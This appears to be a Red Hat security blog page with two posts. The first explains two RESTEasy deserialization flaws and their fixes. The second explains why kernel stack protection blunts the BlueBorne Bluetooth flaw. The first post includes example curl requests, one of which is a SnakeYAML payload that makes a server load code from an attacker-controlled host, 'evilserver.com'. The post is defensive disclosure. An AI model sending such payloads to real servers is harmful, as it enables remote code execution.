CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream1 before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.
If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending a HTTP Request with a
Content-Type
ofapplication/x-java-serialized-object
. The body of that request would be processed by the SerializationProvider and could contain a malicious payload generated with ysoserial2 or similar. A remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.Here's an example:
curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'
CVE-2016-9606 also exploited the default providers of Resteasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the Snakeyaml library from Resteasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.
SnakeYaml allows loading classes with a URLClassloader, using it's ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.
An example of a malicious request is as follows:
curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat
Where evilserver.com is a host controlled by the malicious actor
Again, you can see the use of
Content-Type
, HTTP Header, which tricks RESTEasy into using YamlProvider, even though the developer didn't intend for it to be accessible.How to stay safe
The latest versions of EAP 6.4.x, and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1 and is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either of EAP 6.4.x, or 7.0.x.
If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:
import java.util.*; import javax.ws.rs.*; import javax.ws.rs.core.*; @Path("/") public class PoC_resource { @POST @Path("/concat") @Consumes("application/json") public Map<String, String> doConcat(Pair pair) { HashMap<String, String> result = new HashMap<String, String>(); result.put("Result", pair.getP1() + pair.getP2()); return result; } }
Notice this safe version added a @Consumes annotation with a mediaType of
application/json
This is good practice anyway, because if a HTTP client tries to send a request with a different Content-Type HTTP Header the application will give an appropriate error response, indicating that the Content-Type is not supported.
Posted: 2017-10-18T13:30:00+00:00 - @Consumes annotation was present specifying wildcard mediaType
-
Kernel Stack Protector and BlueBorne
Today, a security issue called BlueBorne was disclosed, a vulnerability that could be used to attack sensitive systems via the Bluetooth protocol. Specifically, BlueBorne is a flaw where a remote (but physically quite close) attacker could get root on a server, without an internet connection or authentication, via installed and active Bluetooth hardware.
The key phrase is “has the potential.” BlueBorne is still a serious flaw and one that requires patching and remediation, but most Red Hat Enterprise Linux users are at less risk of a direct attack. This is because Bluetooth hardware is not particularly common on servers, and our Server distributions of Red Hat Enterprise Linux don’t enable Bluetooth by default. But what about the desktop and workstation users of Red Hat Enterprise Linux and many other Linux distributions?
Laptops and desktop machines commonly have Bluetooth hardware, and Workstation variants of Red Hat Enterprise Linux enable Bluetooth by default. It’s possible that a malicious actor could use a remote Bluetooth connector to gain access to personal workstations or terminals in an office building, allowing them to gain root for accessing sensitive data or potentially causing a cascading, system-wide attack. This is unlikely, however, on Linux operating systems, including Red Hat Enterprise Linux, thanks to Stack Protection.
Stack Protection has been available for some time, having been introduced in some distributions back in 2005. We believe most major vendor distributions build their Linux kernels with Stack Protection enabled. For us, this includes Fedora Core (since version 5) and Red Hat Enterprise Linux (since version 6). With a kernel compiled in this way, the flaw turns from remote code execution to a remote crash (kernel panic). While having a physically local attacker being able to cause your machines to crash without touching them is bad, but it’s certainly not as bad as remote root.
Red Hat, along with other Linux distribution vendors and the upstream Kernel security team, received one week advance notice on BlueBorne in order to prepare patches and updates. We used this time to evaluate the issue, develop the fix and build and test updated packages for supported versions of Red Hat Enterprise Linux. We also used the time to provide clearly understood information about the flaw, and how it impacted our products, which can be found in the Vulnerability Article noted below.
Because Stack Protection works by adding a single check value (a canary) to the stack before the return address, a buffer overflow could overwrite other buffers on the stack before that canary depending on how things get ordered, so it was important for us to check properly. Based on a technical investigation we concluded that with Stack Protection enabled, it would be quite unlikely to be able to exploit this to gain code execution. We can’t completely rule it out, though, as an attacker may be able to use some other mechanism to bypass it (for example, if they can determine the value of the stack canary, maybe a race condition, combining it with some other flaw).
On some architectures, notably ppc64 and s390x for Red Hat Enterprise Linux, Stack Protection is not used. However the Bluetooth kernel module is not available for our s390x Server variant. And ppc64 is only available in a Server variant, which doesn’t install the bluez package, making it not vulnerable by default even if Bluetooth hardware happens to be present.
So if most distributions build kernels with Stack Protection, and Stack Protection has been available for many years before the flaw was introduced, where is the risk? Well, the problem is going to be all those kernels that have been built without Stack Protection turned on. So things like IoT devices that are Bluetooth enabled along with a vulnerable kernel compiled without Stack Protection will be most at risk from this flaw.
Regardless of whether you have Stack Protection or not, patch your system. BlueBorne remains an important flaw and one that needs to be remedied as soon as possible via the appropriate updates.
For Red Hat customers our page https://access.redhat.com/security/vulnerabilities/blueborne contains information on the patches we released today along with other details and mitigations. We’d like to thank Armis Labs for reporting this vulnerability.
Posted: 2017-09-12T11:51:33+00:00